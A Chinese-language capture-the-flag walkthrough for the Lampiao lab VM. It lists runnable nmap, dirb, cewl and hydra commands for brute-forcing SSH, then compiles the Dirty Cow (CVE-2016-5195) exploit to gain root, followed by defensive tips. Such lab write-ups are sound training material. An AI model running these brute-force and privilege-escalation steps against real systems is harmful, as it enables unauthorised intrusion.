No.2-红队渗透项目:Lampiao
字数 1213 2025-08-19 12:42:22
Lampiao靶机渗透测试详细教程
1. 靶机信息
- 靶机名称:Lampiao
- 难度等级:中等
- 技术要点:信息收集、Web渗透、Drupal漏洞利用、SSH爆破、内核提权(Dirty Cow)
- 测试环境:VMware虚拟机,Kali Linux作为攻击机
2. 信息收集阶段
2.1 网络扫描
使用nmap进行主机发现:
nmap -sP 192.168.111.0/24
发现目标IP:192.168.111.129
2.2 端口扫描与服务识别
全端口扫描:
nmap -p- 192.168.111.129
发现开放端口:
- 22/tcp - SSH
- 80/tcp - HTTP
- 1898/tcp - HTTP
2.3 Web服务枚举
访问Web服务:
http://192.168.111.129:1898/
发现两个重要资源:
- 音频文件:
http://192.168.111.129:1898/audio.m4a- 播放后获得用户名:tiago
- 二维码图片:
http://192.168.111.129:1898/qrc.png- 扫描后无有效信息
2.4 目录爆破
使用dirb进行目录枚举:
dirb http://192.168.111.129:1898
发现重要文件:
robots.txtCHANGELOG.txt
通过CHANGELOG.txt确认网站使用Drupal 7.54
3. Web渗透阶段
3.1 密码字典生成
使用cewl爬取网站生成密码字典:
cewl http://192.168.111.129:1898/?q=node/1 -w dayu.txt
3.2 SSH爆破
使用hydra进行SSH爆破:
hydra -l tiago -P dayu.txt 192.168.111.129 ssh
成功获取密码:Virgulino
3.3 SSH登录
使用获取的凭据登录:
ssh tiago@192.168.111.129
密码:Virgulino
4. 权限提升阶段
4.1 系统信息收集
登录后检查用户权限和系统信息:
id
uname -a
确认当前为低权限用户,需要提权
4.2 漏洞利用建议
下载linux-exploit-suggester脚本:
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
(注意:如果网络受限,可使用代理或本地HTTP服务器)
赋予执行权限并运行:
chmod +x les.sh
./les.sh
扫描结果显示存在Dirty Cow漏洞(CVE-2016-5195)
4.3 Dirty Cow漏洞利用
搜索并下载40847漏洞利用代码:
searchsploit dirty cow
或在线搜索"40847 exploit"
编译漏洞利用代码:
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
执行后获得root权限,设置密码为"dirtyCowFun"
4.4 Root登录
使用新密码通过SSH登录root账户:
ssh root@192.168.111.129
密码:dirtyCowFun
5. 获取Flag
在root目录下找到flag:
9740616875908d91ddcdaa8aea3af366
6. 技术要点总结
- 信息收集:全面的端口扫描和目录枚举是关键
- 凭证获取:通过音频文件获取用户名,cewl生成字典,hydra爆破SSH
- 漏洞利用:识别Drupal版本,利用已知漏洞
- 权限提升:使用Dirty Cow漏洞进行内核提权
- 代理使用:在受限网络环境下使用代理或本地HTTP服务器传输文件
7. 防御建议
- 及时更新系统和应用补丁
- 使用强密码策略,避免密码重用
- 限制SSH访问,使用密钥认证
- 关闭不必要的服务和端口
- 定期进行安全审计和漏洞扫描
注意:本教程仅用于合法授权的渗透测试和安全研究,未经授权对他人系统进行测试是违法行为。